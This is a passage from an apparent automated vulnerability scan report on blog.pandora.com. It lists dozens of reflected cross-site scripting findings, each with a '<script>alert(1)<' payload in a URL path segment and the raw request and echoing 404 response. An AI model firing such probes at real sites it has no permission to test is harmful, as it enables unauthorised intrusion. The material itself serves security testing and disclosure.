HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae4fb4<script>alert(1)< ...[SNIP]... |
3.394. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f143<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8f143<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8f143<script>alert(1)< ...[SNIP]... |
3.395. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27558<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other ...[SNIP]... |
3.396. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4116e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4116e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4116e<script>alert(1)< ...[SNIP]... |
3.397. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbc81<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbbc81<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbbc81<script>alert(1)< ...[SNIP]... |
3.398. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3b20<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other ...[SNIP]... |
3.399. http://blog.pandora.com/pandora/archives/other_states/index.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a28a3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other ...[SNIP]... |
3.400. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e30d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2e30d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2e30d<script>alert(1)< ...[SNIP]... |
3.401. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37daf<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives37daf<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives37daf<script>alert(1)< ...[SNIP]... |
3.402. http://blog.pandora.com/pandora/archives/pennsylvania/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60d1f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 354 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.403. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/play |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a40f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9a40f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 360 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9a40f<script>alert(1)< ...[SNIP]... |
3.404. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/play |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 604e5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives604e5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives604e5<script>alert(1)< ...[SNIP]... |
3.405. http://blog.pandora.com/pandora/archives/play-listen-repeat/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/play |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2f58<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/play Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/play ...[SNIP]... |
3.406. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/rhode |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 410e8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora410e8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora410e8<script>alert(1)< ...[SNIP]... |
3.407. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/rhode |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7510<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc7510<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc7510<script>alert(1)< ...[SNIP]... |
3.408. http://blog.pandora.com/pandora/archives/rhode-island/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/rhode |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61a2b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/rhode Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/rhode ...[SNIP]... |
3.409. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5b43<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae5b43<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae5b43<script>alert(1)< ...[SNIP]... |
3.410. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d8f8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3d8f8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3d8f8<script>alert(1)< ...[SNIP]... |
3.411. http://blog.pandora.com/pandora/archives/roadtrip/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccdb2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.412. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e73b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e73b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6e73b<script>alert(1)< ...[SNIP]... |
3.413. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e3124<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese3124<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese3124<script>alert(1)< ...[SNIP]... |
3.414. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c76<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 359 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.415. http://blog.pandora.com/pandora/archives/roadtrip/index.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e61d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.416. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/south |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8354d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8354d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8354d<script>alert(1)< ...[SNIP]... |
3.417. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/south |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26b1e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives26b1e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives26b1e<script>alert(1)< ...[SNIP]... |
3.418. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/south |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11e8c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/south Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 354 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/south ...[SNIP]... |
3.419. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a87e3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa87e3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa87e3<script>alert(1)< ...[SNIP]... |
3.420. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be7ff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbe7ff<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbe7ff<script>alert(1)< ...[SNIP]... |
3.421. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0a19<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.422. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/texas/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dd0c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dd0c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2dd0c<script>alert(1)< ...[SNIP]... |
3.423. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/texas/ |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76e6c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
